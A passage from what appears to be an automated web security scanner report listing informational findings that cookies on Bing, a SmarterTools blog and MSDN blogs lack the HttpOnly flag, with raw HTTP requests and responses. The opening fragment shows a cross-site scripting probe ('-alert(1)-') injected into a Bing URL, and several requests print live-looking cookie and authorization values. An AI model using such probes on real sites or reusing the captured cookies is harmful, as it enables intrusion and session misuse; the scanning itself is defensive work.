Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC; _HOP=

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLS
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Set-Cookie: _HOP=I=1&TS=1301101471; domain=bing.com; path=/
Date: Sat, 26 Mar 2011 01:04:30 GMT

15.29. http://bing.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1693482&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/maps
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Set-Cookie: _HOP=I=1&TS=1301100909; domain=bing.com; path=/
Date: Sat, 26 Mar 2011 00:55:08 GMT

15.30. http://blog.smartertools.com/Themes/Blogs/leanandgreen/style/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.smartertools.com
Path:   /Themes/Blogs/leanandgreen/style/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/Blogs/leanandgreen/style/DynamicStyle.aspx?SectionID=49 HTTP/1.1
Host: blog.smartertools.com
Proxy-Connection: keep-alive
Referer: http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41510257.1300315555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41510257.1575383479.1300315555.1300315555.1300315555.1; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.5.10.1301158717; CommunityServer-LastVisitUpdated-2570=; CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:12 GMT; CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.0
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:14 GMT; expires=Sun, 25-Mar-2012 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:14 GMT

15.31. http://blog.smartertools.com/archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.smartertools.com
Path:   /archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx HTTP/1.1
Host: blog.smartertools.com
Proxy-Connection: keep-alive
Referer: http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41510257.1300315555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.5.10.1301158717; CommunityServer-LastVisitUpdated-2570=; CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4; CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:13 GMT; __utma=41510257.1575383479.1300315555.1300315555.1301158742.2; __utmc=41510257; __utmb=41510257.1.10.1301158742

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
CommunityServer: 3.1.31113.47
X-Pingback: http://blog.smartertools.com/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:28 GMT; expires=Sun, 25-Mar-2012 16:58:28 GMT; path=/
Set-Cookie: CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4; expires=Sat, 26-Mar-2011 17:18:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:27 GMT
Content-Length: 27402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.32. http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.smartertools.com
Path:   /archive/2011/03/23/lessons-learned-from-gdc-2011.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /archive/2011/03/23/lessons-learned-from-gdc-2011.aspx HTTP/1.1
Host: blog.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie2570=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 16 Mar 2011 15:45:59 GMT; __utmz=41510257.1300315555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41510257.1575383479.1300315555.1300315555.1300315555.1; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.5.10.1301158717

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
CommunityServer: 3.1.31113.47
X-Pingback: http://blog.smartertools.com/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:13 GMT; expires=Sun, 25-Mar-2012 16:58:13 GMT; path=/
Set-Cookie: CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4; expires=Sat, 26-Mar-2011 17:18:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:12 GMT
Content-Length: 29521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.33. http://blog.smartertools.com/themes/leanandgreen/style/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.smartertools.com
Path:   /themes/leanandgreen/style/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/leanandgreen/style/DynamicStyle.aspx HTTP/1.1
Host: blog.smartertools.com
Proxy-Connection: keep-alive
Referer: http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41510257.1300315555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41510257.1575383479.1300315555.1300315555.1300315555.1; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.5.10.1301158717; CommunityServer-LastVisitUpdated-2570=; CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:12 GMT; CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/css; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:13 GMT; expires=Sun, 25-Mar-2012 16:58:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:12 GMT
Content-Length: 4932


body, html
{
background-color: #606060;
background-image: none;
}

body, html, .CommonContent
{
font-family: Tahoma, Arial, Helvetica;
color: #000000;
}

A:LINK, .Commo
...[SNIP]...
15.34. http://blogs.msdn.com/Themes/MSDN2/Images/MSDN/bg_body_MSDN.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /Themes/MSDN2/Images/MSDN/bg_body_MSDN.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/MSDN2/Images/MSDN/bg_body_MSDN.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a00+GMT; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:06 GMT
Accept-Ranges: bytes
ETag: "f6544ba962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a40+GMT; expires=Sun, 25-Mar-2012 01:41:40 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:38 GMT
Content-Length: 4900

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<..1iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
15.35. http://blogs.msdn.com/Utility/FooterFragments/Core/UserInfoPopup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /Utility/FooterFragments/Core/UserInfoPopup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Utility/FooterFragments/Core/UserInfoPopup.js?Version=5.5.134.13807&LastChanged=634317577742245126 HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a00+GMT; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:54 GMT
Accept-Ranges: bytes
ETag: "6dda5c562becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+28+Feb+2011+19%3a23%3a13+GMT&mra=Sat%2c+26+Mar+2011+01%3a45%3a30+GMT; expires=Sun, 25-Mar-2012 01:45:30 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:45:30 GMT
Content-Length: 6913


function Core_UserInfoPopup_AttachToUserElements(context)
{
$('.internal-link.view-user-profile, .internal-link.view-profile, .avatar > a')
.live("mouseover", function() { Core_UserIn
...[SNIP]...
15.36. http://blogs.msdn.com/b/sharepoint_workspace_development_team/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /b/sharepoint_workspace_development_team/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/sharepoint_workspace_development_team/ HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; communityserver-usercookie1001=lv=Fri%2c+04+Mar+2011+20%3a19%3a26+GMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: communityserver-usercookie1001=lv=Sat%2c+12+Mar+2011+13%3a09%3a16+GMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a29+GMT; expires=Sun, 25-Mar-2012 01:43:29 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN
X-AspNet-Version: 2.0.50727
Set-Cookie: AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; expires=Sun, 27-Mar-2011 01:43:29 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:28 GMT
Content-Length: 107830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.37. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/contentpane.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/MSDN/contentpane.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/MSDN/contentpane.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:06 GMT
Accept-Ranges: bytes
ETag: "363750a962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+13%3a12%3a04+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a33+GMT; expires=Sun, 25-Mar-2012 01:41:33 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:39 GMT
Content-Length: 873

.PNG
.
...IHDR.......&.......R.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...A..0.@Q...^.R....*Uj.....c..,:...$+$."e.e01._....pLy.N9.I.....D..@.v.
f....,o..[a<u.w..(....HA.7.[... zc1B..(....h1\o
...[SNIP]...
15.38. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/layout-background.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/MSDN/layout-background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/MSDN/layout-background.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:06 GMT
Accept-Ranges: bytes
ETag: "d06ba962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a42+GMT; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:39 GMT
Content-Length: 169

.PNG
.
...IHDR..............agm....tEXtSoftware.Adobe ImageReadyq.e<...KIDATx.....0..A..u..+......}.h.iG..up...Z>.jS{U..........1...k{f...5?*.................IEND.B`.
15.39. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/logo_msdn.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/MSDN/logo_msdn.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/MSDN/logo_msdn.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:06 GMT
Accept-Ranges: bytes
ETag: "d6f56fa962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a41+GMT; expires=Sun, 25-Mar-2012 01:41:41 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:39 GMT
Content-Length: 2189

.PNG
.
...IHDR...O..........!......tEXtSoftware.Adobe ImageReadyq.e<.../IDATx...    pT.....#...........R*uj....S.L.Z.Zg...vh..vh..hm+.......a.P ........H.\.>61.3{.........v..D...|.x.......c...bNf%...
...[SNIP]...
15.40. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/search2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/MSDN2/Images/MSDN/search2.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/MSDN2/Images/MSDN/search2.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:07 GMT
Accept-Ranges: bytes
ETag: "f6ef85a962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a42+GMT; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:40 GMT
Content-Length: 785

.PNG
.
